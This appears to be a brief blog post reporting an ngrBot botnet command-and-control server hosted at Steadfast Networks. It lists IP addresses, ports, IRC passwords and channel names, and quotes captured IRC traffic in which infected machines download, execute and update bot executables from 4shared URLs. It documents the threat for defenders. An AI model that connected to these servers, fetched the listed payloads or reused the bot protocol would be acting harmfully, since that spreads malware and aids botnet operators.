208.117.34.213(ngrBot hosted in United States Laird Hill Steadfast Networks)

Remote Host Port Number
199.101.133.144 80
199.101.133.25 80
199.15.234.7 80
208.117.34.213 1888 PASS ngrBot

PRIVMSG :[d=”http://dc387.4shared.com/download/k1pyhC72/robertiniii.exe” s=”81920 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data2.exe” – Download retries: 0
NICK n{US|XPa}mgycnpm
USER mgycnpm 0 0 :mgycnpm
JOIN ##center 1963.g3rb3rs1t0.3691
JOIN
JOIN #US
PRIVMSG :[d=”http://dc355.4shared.com/download/dPl-t_0P/fdbfdf542.exe” s=”167936 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataLdxaxl.exe” – Download retries: 0

# The data identified by the following URLs was then requested from the remote web server:

* http://dc370.4shared.com/download/lIf5zud7/homigdlfl.exe

UPDATE:
Remote Host Port Number
199.15.234.7 80
199.80.53.92 80
208.117.34.213 1889 PASS mflrod

NICK n{US|XPa}unkvvmc
USER unkvvmc 0 0 :unkvvmc
JOIN #zxcv mflrod
PRIVMSG #zxcv :[d=”http://dc185.4shared.com/download/VVHuT6NC/sdfssss.exe” s=”167936 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataScxaxs.exe” – Download retries: 0

hosting infos:
http://whois.domaintools.com/208.117.34.213

Categories: Uncategorized